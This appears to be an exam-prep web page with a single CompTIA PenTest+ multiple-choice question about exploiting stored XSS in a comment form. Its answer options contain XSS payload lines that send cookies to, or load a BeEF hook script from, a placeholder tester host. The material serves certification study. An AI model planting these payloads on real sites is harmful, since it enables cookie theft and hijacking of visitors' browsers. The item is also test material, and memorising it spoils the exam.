Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

CompTIA PenTest+ Exam PT0-003 Question # 86 Topic 9 Discussion

CompTIA PenTest+ Exam PT0-003 Question # 86 Topic 9 Discussion

PT0-003 Exam Topic 9 Question 86 Discussion:
Question #: 86
Topic #: 9

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?


A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "


B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >


C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >


D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "


Get Premium PT0-003 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.